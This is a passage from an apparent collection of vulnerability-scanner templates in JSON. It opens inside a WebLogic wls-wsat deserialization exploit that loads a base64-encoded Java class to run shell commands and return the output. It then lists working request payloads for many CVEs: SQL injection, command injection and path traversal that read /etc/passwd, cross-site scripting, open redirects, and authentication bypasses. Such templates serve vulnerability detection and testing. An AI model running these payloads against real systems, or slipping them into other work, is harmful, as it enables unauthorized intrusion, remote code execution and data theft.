index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nkeys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","!contains(body_1, \"phpinfo\")","contains_all(body_2, \"phpinfo\",\"PHP Version\")"],"condition":"and"}]}]},{"id":"CVE-2019-0232","info":{"name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /?&echo+{{sid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{sid}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Church Admin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site 